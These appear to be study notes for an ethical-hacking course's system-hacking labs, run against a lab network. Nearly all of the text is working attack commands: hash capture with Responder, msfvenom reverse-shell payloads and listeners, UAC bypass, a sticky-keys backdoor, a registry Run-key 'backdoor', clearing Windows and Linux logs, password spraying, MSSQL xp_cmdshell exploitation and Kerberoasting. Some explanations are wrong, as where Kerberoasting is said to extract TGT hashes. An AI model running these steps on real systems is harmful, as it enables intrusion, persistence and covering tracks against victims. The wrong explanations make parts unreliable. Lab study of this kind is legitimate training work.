Module 06: System Hacking
Lab 1: Gain Access to the System
Task 1: Perform Active Online Attack to Crack the System’s Password using Responder
### Step -1 : Using Responder on ParrotOS
sudo responder -I eth0
Capturing the hash via logging into :
run (Win+R) --> //CEH-Tools
## Step -2 : Cracking hash using JohntheRipper
john <input_file.txt>
Task 2: Gain Access to a Remote System using Reverse Shell Generator
Step -1 : Reverse shell generator
1.1 : Running reverse shell generator on docker :
docker run -d -p 80:80 reverse_shell_generator
1.2 : Reverse shell generator on web :
https://www.revshells.com
Step -2 : Modules used for cracking :
1. Msfvenom
2. HoaxShellTask 3: Perform Buffer Overflow Attack to Gain Access to a Remote System
1. Setting Up the Vulnerable Server
Objective: Launch the
vulnserverapplication on a Windows 11 machine to simulate a vulnerable service for testing buffer overflow attacks.Steps:
Restart the machine and log in as the admin user.
Navigate to the
vulnserver.exefile and run it as an administrator.Configure Windows Security settings to allow access, ensuring the server runs without firewall interference.
Explanation: vulnserver is a deliberately vulnerable program used to practice exploitation techniques, like buffer overflow, in a controlled environment. Running it as an administrator and allowing network access ensures it functions correctly.
2. Installing and Setting Up Immunity Debugger
Objective: Use Immunity Debugger to monitor and analyze the behavior of the vulnerable application.
Steps:
Install Immunity Debugger and Python (required for running debugger scripts).
Launch Immunity Debugger and attach it to the
vulnserverprocess.Change the debugger status to "Running."
Explanation: Immunity Debugger allows you to observe application memory, register states, and interactions with system resources. Attaching it to vulnserver facilitates the identification of vulnerabilities like buffer overflows.
3. Establishing a Connection with Netcat
Objective: Test the
vulnserverfunctionality using Netcat from the Parrot Security machine.Steps:
Connect to the
vulnserverusing thenc -nv <IP> 9999command.Test commands like
HELPandEXITto verify server responses.
Explanation: Netcat is a versatile tool for network diagnostics and testing. In this context, it’s used to verify that the vulnerable server is accessible and responds to commands.
Commands used :
nc -nv 10.10.1.11 99994. Performing Spiking
Objective: Identify vulnerable functions in the server by sending malformed inputs.
Steps:
Create spike scripts for specific functions (
STATSandTRUN).Use the
generic_send_tcptool to send these scripts to the server and observe responses in Immunity Debugger.
Explanation: Spiking involves crafting specific inputs to test server functions for buffer overflow vulnerabilities. The debugger's status change to "Paused" indicates a possible vulnerability.
Files to be made to check Spikes :
1. Using Spikes [STATS]
s_readline();
s_string(“STATS ”);
s_string_variable(“0”);
2. Using Spikes [TRUN]
s_readline();
s_string(“TRUN”);
s_string_variable(“0”);
## Commands to be used :
1. generic_send_tcp stats.spk 0 0
2. generic_send_tcp trun.spk 0 05. Conducting Fuzzing
Objective: Send a large volume of data to identify the exact buffer size that causes an overflow.
Steps:
Use Python scripts to send incrementally larger payloads to the vulnerable function.
Note the size of the payload when the server crashes.
Explanation: Fuzzing determines the threshold at which a buffer overflow occurs, helping pinpoint the exploit size. The overflow size is critical for crafting an exploit.
## Commands used :
sudo chmod +x fuzz.py
./fuzz.py6. Generating and Identifying Offsets
Objective: Determine the exact location of the overflow within the memory (EIP register).
Steps:
Use
pattern_create.rbto generate a unique payload.Overwrite the server with the pattern and use
pattern_offset.rbto calculate the EIP offset.
Explanation: The EIP register controls execution flow. Identifying its offset ensures you can control execution by overwriting the register with malicious shellcode.
## Commands used :
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <nearest offset value eg: 10400>
### Replace the generated offsets into the file findoff.py
sudo chmod +x findoff.py
./findoff.py
Note down the random bytes in the EIP and find the offset of those bytes.
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 10400 -q 386F4337
## Checking wheather we can override the function to exec commands
sudo chmod +x overwrite.py
./overwrite.py7. Locating Bad Characters
Objective: Identify characters that could disrupt the exploit payload.
Steps:
Send all possible byte values to the server and analyze memory dumps for discrepancies.
Explanation: Bad characters, like null bytes (\x00), can terminate strings prematurely, corrupting payloads. Removing these ensures a reliable exploit.
## Commands used :
sudo chmod +x badchars.py
./badchars.py
# Read the ESP values offset generated and select "Follow in Dump" by right clicking on the offset8. Identifying Vulnerable Modules
Objective: Find server modules lacking security protections, such as ASLR or DEP.
Steps:
Use
mona.pyin Immunity Debugger to list modules and their memory protections.Identify a module (e.g.,
essfunc.dll) without protections.
Explanation: Exploiting a module without memory protections simplifies the attack, as it ensures predictable memory addresses.
### Commands used :
!mona modules
## Run the below code after executing converter.py section 9
!mona find -s “\xff\xe4” -m essfunc.dll9. Finding a JMP ESP Address
Objective: Locate an instruction (
JMP ESP) to redirect execution to the payload.Steps:
Use
mona.pyto find a usableJMP ESPinstruction in the identified module.Convert the address to hexadecimal for use in the exploit.
Explanation: A JMP ESP instruction is crucial for redirecting execution to the payload stored on the stack.
## Commands used :
python3 converter.py
The Enter the assembly code here : prompt appears; type JMP ESP and press Enter.
The result appears, displaying the hex code of JMP ESP (here, ffe4).10. Crafting and Running the Exploit
Objective: Inject malicious shellcode to achieve control of the target machine.
Steps:
Write a Python script that includes the calculated offset,
JMP ESPaddress, and malicious shellcode.Send the crafted payload to the server and verify execution control via Immunity Debugger.
Explanation: By overwriting the EIP and injecting shellcode, you gain control over the vulnerable application, demonstrating the exploitation of the buffer overflow vulnerability.
## Commands used :
msfvenom -p windows/shell_reverse_tcp LHOST=[Local IP Address] LPORT=[Listening Port] EXITFUNC=thread -f c -a x86 -b “\x00”
Copy the shell code generated & edit the shell_code.py file
type b in the begining of every line to convert strings to bytes
## Starting listening service
nc -nvlp 4444
## Executing Payload
sudo chmod +x shellc_ode.py
./shell_code.pyLab 2: Perform Privilege Escalation to Gain Higher Privileges
Task 1: Escalate Privileges by Bypassing UAC and Exploiting Sticky Keys
## Payload Crafting using msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Desktop/Windows.exe
Share the payload into the vulnerable machine
## MSF Console
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST & LPORT
exploitAs the result 1 meterpreter shell will be opened and now we will excelate the priviledges using bypassing UAC
## Backgrounding sessions:
background
## using BypassUAC by fodhelper
use exploit/windows/local/bypassuac_fodhelper
set sessions 1
set TARGET 0
set LHOST & LPORT
exploit
## once session is upgraded we will pass the UAC
getsystem -t 1
background
## Now we will use stickykeys to open root shell
use post/windows/manage/sticky_keys
set session 2
expolit
## Now on the login screen of windows try clicking shift to 5 times and shell will be openedLab 3: Maintain Remote Access and Hide Malicious Activities
Task 1: User System Monitoring and Surveillance using Spyrix
Use the temp mail to signup
use to same mailid to for agents and server for configTask 2: Maintain Persistence by Modifying Registry Run Keys
Registry keys labeled as Run and RunOnce are crafted to automatically run programs upon each user login to the system. The command line specified as a key's data value is restricted to 260 characters or fewer. If attackers discover a service connected to a registry key with full permissions, they can execute persistence attacks or exploit privilege escalation. Upon any authorized user's login attempt, the associated service link within the registry triggers automatically.
Commands used :
1. Initial Access file :
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Desktop/Test.exe
2. Persistent access file :
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=4444 -f exe > /home/attacker/Desktop/registry.exe
## msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST & LPORT
background
use exploit/windows/local/bypassuac_silentcleanup
set TARGET 0
SET LHOST & LPORT
getsystem -t 1
## Modifying the registry
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v backdoor /t REG_EXPAND_SZ /d "C:\Users\Admin\Downloads\registry.exe"
Lab 4: Clear Logs to Hide the Evidence of Compromise
Task 1: Clear Windows Machine Logs using Various Utilities
Softwares used :
Clear_Event_Viewer_Logs.bat, wevtutil, and Cipher
## wevtutil Usage :
wevtutil el
wevtutil el <log_name>
wevtutil cl
wevtutil cl <logname>
## Cipher Usage :
cipher /w: <Disk or Folder or File>Task 2: Clear Linux Machine Logs using the BASH Shell
## Commands used :
export HISTSIZE=0 # It disables the logging
history -c # it cleares the history
history -w # it cleares the history of current shell
shred ~/.bash_history # shreads the file
Lab 5: Perform Active Directory (AD) Attacks Using Various Tools
Task 1: Perform Initial Scans to Obtain Domain Controller IP and Domain Name
## Commands used :
nmap -T4 -A -v <IP>Task 2: Perform AS-REP Roasting Attack
## Commands used :
cd /impacket/examples
python3 GetNPUsers.py CEH.com/ -no-pass -usersfile /root/ADtools/users.txt -dc-ip 10.10.1.22
## Cracking the hashes
john --wordlist=/root/ADtools/rockyou.txt joshuahash.txtTask 3: Spray Cracked Password into Network using CrackMapExec.
## Commands used :
cme rdp 10.10.1.0/24 -u /root/ADtools/users.txt -p “cupcake” Task 4: Perform Post-Enumeration using PowerView
## Commands used :
powershell -EP Bypass
. .\PowerView.ps1 to run the scriptGet-NetComputer command in PowerShell. This command will display all the information related to computers in AD.
Get-NetGroup in PowerShell. The Get-NetGroup command in PowerView lists all groups in AD, which helps in identifying group memberships and potential targets for privilege escalation.
Get-NetUser in PowerShell. Get-NetUser in PowerView retrieves detailed information about AD user accounts, such as usernames and group memberships.
Get-NetOU - Lists all organizational units (OUs) in the domain.
Get-NetSession - Lists active sessions on the domain.
Get-NetLoggedon - Lists users currently logged on to machines.
Get-NetProcess - Lists processes running on domain machines.
Get-NetService - Lists services on domain machines.
Get-NetDomainTrust - Lists domain trust relationships.
Get-ObjectACL - Retrieves ACLs for a specified object.
Find-InterestingDomainAcl - Finds interesting ACLs in the domain.
Get-NetSPN - Lists service principal names (SPNs) in the domain.
Invoke-ShareFinder - Finds shared folders in the domain.
Invoke-UserHunter - Finds where domain admins are logged in.
Invoke-CheckLocalAdminAccess - Checks if the current user has local admin access on specified machines.
Task 5: Perform Attack on MSSQL service
Save the username SQL_srv in a text file and name it as user.txt using command pluma user.txt.
echo "SQL_srv" >> user.txtNow we wil use hydra to execute password spray on the user and get the password of the user SQL_srv
hydra -L user.txt -P /root/ADtools/rockyou.txt 10.10.1.30 mssqlNow using the script to get the database
python3 /root/impacket/examples/mssqlclient.py CEH.com/SQL_srv:batman@10.10.1.30 -port 1433
SELECT name, CONVERT(INT, ISNULL(value, value_in_use)) AS IsConfigured FROM sys.configurations WHERE name='xp_cmdshell';Now, as we know that xp_cmdshell is enabled on SQL server we can use Metasploit to exploit this service. Type exit and press Enter; then execute the command msfconsole to launch Metasploit.
Msfconsole
use exploit/windows/mssql/mssql_payload
set RHOST 10.10.1.30
set USERNAME SQL_srv
set PASSWORD batman
set DATABASE master
exploitTask 6: Perform Privilege Escalation
## Scripts used :
./winpeas.exeTask 7: Perform Kerberoasting Attack
Rubeus is a tool for exploiting Kerberos weaknesses in Windows environments. Kerberoasting is a method to extract ticket granting ticket (TGT) hashes from AD. Attackers target service accounts with associated Kerberos service principal names (SPNs). TGTs are requested from the DC for these accounts, then cracked offline to reveal user passwords. Kerberoasting exploits weak service account passwords and the nature of Kerberos authentication.
rubeus.exe kerberoast /outfile:hash.txt
hashcat -m 13100 --force -a 0 hash.txt /root/ADtools/rockyou.txt-m 13100: This specifies the hash type. 13100 corresponds to Kerberos 5 AS-REQ Pre-Auth etype 23 (RC4-HMAC), a specific format for Kerberos hashes.
--force: This option forces Hashcat to ignore warnings and run even if there are compatibility issues. Use this with caution, as it might cause instability or incorrect results.
-a 0: This specifies the attack mode. 0 stands for a straight attack, which is a simple dictionary attack where Hashcat tries each password in the dictionary as it is.
hash.txt: is the input file containing the hashes to crack
/root/ADtools/rockyou.txt: is the wordlist file used for the attack
Last updated